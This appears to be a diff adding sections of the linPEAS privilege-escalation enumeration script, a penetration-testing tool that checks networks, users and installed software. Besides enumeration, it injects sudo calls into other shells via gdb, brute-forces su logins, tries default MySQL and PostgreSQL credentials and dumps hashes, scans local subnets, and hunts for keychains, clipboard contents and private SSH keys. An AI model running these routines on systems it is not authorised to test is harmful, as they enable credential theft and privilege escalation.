+  print_2title "Wifi Proxy URL"
+  networksetup -getautoproxyurl Wi-Fi
+  echo ""
+  
+  print_2title "Wifi Web Proxy"
+  networksetup -getwebproxy Wi-Fi
+  echo ""
+
+  print_2title "Wifi FTP Proxy"
+  networksetup -getftpproxy Wi-Fi
+  echo ""
+fi
+
+#-- NI) tcpdump
+print_2title "Can I sniff with tcpdump?"
+timeout 1 tcpdump >/dev/null 2>&1
+if [ $? -eq 124 ]; then #If 124, then timed out == It worked
+    print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing"
+    echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+echo ""
+
+#-- NI) Internet access
+if ! [ "$SUPERFAST" ] && [ "$EXTRA_CHECKS" ] && ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then
+  print_2title "Internet Access?"
+  check_tcp_80 2>/dev/null &
+  check_tcp_443 2>/dev/null &
+  check_icmp 2>/dev/null &
+  check_dns 2>/dev/null &
+  wait
+  echo ""
+fi
+
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then
+  if ! [ "$FOUND_NC" ]; then
+    printf $RED"[-] $SCAN_BAN_BAD\n$NC"
+    echo "The network is not going to be scanned..."
+  
+  else
+    print_2title "Scanning local networks (using /24)"
+
+    if ! [ "$PING" ] && ! [ "$FPING" ]; then
+      printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
+    fi
+
+    select_nc
+    local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.")
+    printf "%s\n" "$local_ips" | while read local_ip; do
+      if ! [ -z "$local_ip" ]; then
+        print_3title "Discovering hosts in $local_ip/24"
+        
+        if [ "$PING" ] || [ "$FPING" ]; then
+          discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp
+        fi
+        
+        discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp
+        
+        sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips
+        rm $Wfolder/.ips.tmp 2>/dev/null
+        
+        while read disc_ip; do
+          me=""
+          if [ "$disc_ip" = "$local_ip" ]; then
+            me=" (local)"
+          fi
+          
+          echo "Scanning top ports of ${disc_ip}${me}"
+          (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
+          echo ""
+        done < $Wfolder/.ips
+        
+        rm $Wfolder/.ips 2>/dev/null
+        echo ""
+      fi
+    done
+  fi
+fi
+
+if [ "$MACOS" ]; then
+  print_2title "Any MacOS Sharing Service Enabled?"
+  rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l);
+  scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l);
+  flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l);
+  rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l);
+  rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l);
+  bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l);
+  printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
+  echo ""
+  print_2title "VPN Creds"
+  system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password"  | sed -${E} "s,Password|Authorization Name.*,${SED_RED},"
+  echo ""
+
+  if [ "$EXTRA_CHECKS" ]; then
+    print_2title "Bluetooth Info"
+    warn_exec system_profiler SPBluetoothDataType
+    echo ""
+
+    print_2title "Ethernet Info"
+    warn_exec system_profiler SPEthernetDataType
+    echo ""
+
+    print_2title "USB Info"
+    warn_exec system_profiler SPUSBDataType
+    echo ""
+  fi
+fi

linPEAS/builder/linpeas_parts/5_users_information.sh

@@ -0,0 +1,231 @@
+###########################################
+#----------) Users Information (----------#
+###########################################
+
+#-- UI) My user
+print_2title "My user"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users"
+(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
+echo ""
+
+if [ "$MACPEAS" ];then
+  print_2title "Current user Login and Logout hooks"
+  defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
+  echo ""
+
+  print_2title "All Login and Logout hooks"
+  defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
+  defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist
+  echo ""
+
+  print_2title "Keychains"
+  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker"
+  security list-keychains
+  echo ""
+
+  print_2title "SystemKey"
+  ls -l /var/db/SystemKey
+  if [ -r "/var/db/SystemKey" ]; then 
+    echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},";
+    hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},";
+  fi
+  echo ""
+fi
+
+#-- UI) PGP keys?
+print_2title "Do I have PGP keys?"
+command -v gpg 2>/dev/null || echo_not_found "gpg"
+gpg --list-keys 2>/dev/null
+command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys"
+netpgpkeys --list-keys 2>/dev/null
+command -v netpgp 2>/dev/null || echo_not_found "netpgp"
+echo ""
+
+#-- UI) Clipboard and highlighted text
+if [ "$(command -v xclip 2>/dev/null)" ] || [ "$(command -v xsel 2>/dev/null)" ] || [ "$(command -v pbpaste 2>/dev/null)" ] || [ "$DEBUG" ]; then
+  print_2title "Clipboard or highlighted text?"
+  if [ "$(command -v xclip 2>/dev/null)" ]; then
+    echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+    echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+  elif [ "$(command -v xsel 2>/dev/null)" ]; then
+    echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+    echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+  elif [ "$(command -v pbpaste 2>/dev/null)" ]; then
+    echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+  else echo_not_found "xsel and xclip"
+  fi
+  echo ""
+fi
+
+#-- UI) Sudo -l
+print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid"
+(echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo"
+if [ "$PASSWORD" ]; then
+  (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null  || echo_not_found "sudo"
+fi
+( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null  || echo_not_found "/etc/sudoers"
+if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
+  echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+fi
+for filename in '/etc/sudoers.d/*'; do
+  if [ -r "$filename" ]; then
+    echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g"
+    grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},"
+  fi
+done
+echo ""
+
+#-- UI) Sudo tokens
+print_2title "Checking sudo tokens"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens"
+ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
+if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g";
+else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
+fi
+is_gdb="$(command -v gdb 2>/dev/null)"
+if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
+else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g";
+fi
+if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then
+  echo "Checking for sudo tokens in other shells owned by current user"
+  for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do
+    echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null)
+    echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1
+    if [ -f "/tmp/shrndom32r2r" ]; then
+      echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},";
+      break
+    fi
+  done
+  if [ -f "/tmp/shrndom32r2r" ]; then
+    rm -f /tmp/shrndom32r2r 2>/dev/null
+  else echo "The escalation didn't work... (try again later?)"
+  fi
+fi
+echo ""
+
+#-- UI) Doas
+if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
+  print_2title "Checking doas.conf"
+  doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
+  if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then 
+    cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW},"
+  else echo_not_found "doas.conf"
+  fi
+  echo ""
+fi
+
+#-- UI) Pkexec policy
+print_2title "Checking Pkexec policy"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2"
+(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d"
+echo ""
+
+#-- UI) Superusers
+print_2title "Superusers"
+awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED},"
+echo ""
+
+#-- UI) Users with console
+print_2title "Users with console"
+if [ "$MACPEAS" ]; then
+  dscl . list /Users | while read uname; do
+    ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
+    if grep -q "$ushell" /etc/shells; then #Shell user
+      dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+      echo ""
+    fi
+  done
+else
+  no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
+  unexpected_shells=""
+  printf "%s\n" "$no_shells" | while read f; do
+    if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
+      unexpected_shells="$f\n$unexpected_shells"
+    fi
+  done
+  grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+  if [ "$unexpected_shells" ]; then
+    printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
+    echo "Unexpected users with shells:"
+    printf "%s\n" "$unexpected_shells" | while read f; do
+      if [ "$f" ]; then
+        grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
+      fi
+    done
+  fi
+fi
+echo ""
+
+#-- UI) All users & groups
+print_2title "All users & groups"
+if [ "$MACPEAS" ]; then
+  dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
+else
+  cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
+fi
+echo ""
+
+#-- UI) Login now
+print_2title "Login now"
+(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+echo ""
+
+#-- UI) Last logons
+print_2title "Last logons"
+(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+echo ""
+
+#-- UI) Login info
+print_2title "Last time logon each user"
+lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+
+EXISTS_FINGER="$(command -v finger 2>/dev/null)"
+if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
+  dscl . list /Users | while read uname; do
+    ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
+    if grep -q "$ushell" /etc/shells; then #Shell user
+      finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+      echo ""
+    fi
+  done
+fi
+echo ""
+
+#-- UI) Password policy
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Password policy"
+  grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
+  echo ""
+
+  if [ "$MACPEAS" ]; then
+    print_2title "Relevant last user info and user configs"
+    defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
+    echo ""
+
+    print_2title "Guest user status"
+    sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+    sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+    sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+    echo ""
+  fi
+fi
+
+#-- UI) Brute su
+EXISTS_SUDO="$(command -v sudo 2>/dev/null)"
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then
+  print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
+  POSSIBE_SU_BRUTE=$(check_if_su_brute);
+  if [ "$POSSIBE_SU_BRUTE" ]; then
+    SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
+    printf "%s\n" "$SHELLUSERS" | while read u; do
+      echo "  Bruteforcing user $u..."
+      su_brute_user_num "$u" $PASSTRY
+    done
+  else
+    printf $GREEN"It's not possible to brute-force su.\n\n"$NC
+  fi
+else
+  print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC
+fi
+print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC

linPEAS/builder/linpeas_parts/6_software_information.sh

@@ -0,0 +1,627 @@
+###########################################
+#--------) Software Information (---------#
+###########################################
+
+#-- SI) Useful software
+print_2title "Useful software"
+for tool in $USEFUL_SOFTWARE; do command -v "$tool"; done
+echo ""
+
+#-- SI) Search for compilers
+print_2title "Installed Compilers"
+(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/");
+echo ""
+
+if [ "$(command -v pkg 2>/dev/null)" ]; then
+    print_2title "Vulnerable Packages"
+    pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g"
+    echo ""
+fi
+
+if [ "$(command -v brew 2>/dev/null)" ]; then
+    print_2title "Brew Installed Packages"
+    brew list
+    echo ""
+fi
+
+if [ "$MACPEAS" ]; then
+    print_2title "Writable Installed Applications"
+    system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do
+        if [ -w "$f" ]; then
+            echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
+        fi
+    done
+
+    system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do
+        if [ -w "$f" ]; then
+            echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
+        fi
+    done
+fi
+
+#-- SI) Mysql version
+if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then
+  print_2title "MySQL version"
+  mysql --version 2>/dev/null || echo_not_found "mysql"
+  echo ""
+
+  #-- SI) Mysql connection root/root
+  print_list "MySQL connection using default root/root ........... "
+  mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
+  if [ "$mysqlconnect" ]; then
+    echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+    mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+  else echo_no
+  fi
+
+  #-- SI) Mysql connection root/toor
+  print_list "MySQL connection using root/toor ................... "
+  mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null)
+  if [ "$mysqlconnect" ]; then
+    echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+    mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+  else echo_no
+  fi
+
+  #-- SI) Mysql connection root/NOPASS
+  mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
+  print_list "MySQL connection using root/NOPASS ................. "
+  if [ "$mysqlconnectnopass" ]; then
+    echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+    mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+  else echo_no
+  fi
+  echo ""
+fi
+
+#-- SI) Mysql credentials
+if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then
+  print_2title "Searching mysql credentials and exec"
+  printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do
+    for f in $(find $d -name debian.cnf 2>/dev/null); do
+      if [ -r "$f" ]; then
+        echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED},"
+        cat "$f"
+      fi
+    done
+    for f in $(find $d -name user.MYD 2>/dev/null); do
+      if [ -r "$f" ]; then
+        echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED},"
+        grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password"
+      fi
+    done
+    for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do
+      if [ -r "$f" ]; then
+        u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null)
+        echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+      fi
+    done
+    for f in $(find $d -name my.cnf 2>/dev/null); do
+      if [ -r "$f" ]; then
+        echo "Found readable $f"
+        grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED},"
+      fi
+    done
+    mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so")
+    if [ "$mysqlexec" ]; then
+      echo "Found $mysqlexec"
+      echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED},"
+    fi
+  done
+fi
+echo ""
+
+peass{MariaDB}
+
+peass{PostgreSQL}
+
+#-- SI) PostgreSQL brute
+if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then  # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it.
+#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
+  print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ "
+  if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+  else echo_no
+  fi
+
+  print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ "
+  if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED},"
+  else echo_no
+  fi
+
+  print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... "
+  if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+  else echo_no
+  fi
+
+  print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... "
+  if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
+  else echo_no
+  fi
+  echo ""
+fi
+
+peass{Mongo}
+
+peass{Apache}
+
+peass{Tomcat}
+
+peass{FastCGI}
+
+peass{Http_conf}
+
+peass{Htpasswd}
+
+peass{PHP Sessions}
+
+peass{Wordpress}
+
+peass{Drupal}
+
+peass{Moodle}
+
+peass{Supervisord}
+
+peass{Cesi}
+
+peass{Rsync}
+
+peass{Hostapd}
+
+peass{Wifi Connections}
+
+peass{Anaconda ks}
+
+peass{VNC}
+
+peass{OpenVPN}
+
+peass{Ldap}
+
+if [ "$PSTORAGE_LOG4SHELL" ] || [ "$DEBUG" ]; then
+  print_2title "Searching Log4Shell vulnerable libraries"
+  printf "%s\n" "$PSTORAGE_LOG4SHELL" | while read f; do
+    echo "$f" | grep -E "log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])" | sed -${E} "s,log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6]),${SED_RED},";
+  done
+  echo ""
+fi
+
+#-- SI) ssh files
+print_2title "Searching ssl/ssh files"
+if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi
+sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)"
+hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)"
+hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"
+writable_agents=$(find $folder_path -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')')
+
+peass{SSH}
+
+grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
+
+if [ "$TIMEOUT" ]; then
+  privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null)
+  privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
+  privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null)
+  privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null)
+else
+  privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
+  privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
+fi
+
+if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
+  echo ""
+  print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED},"
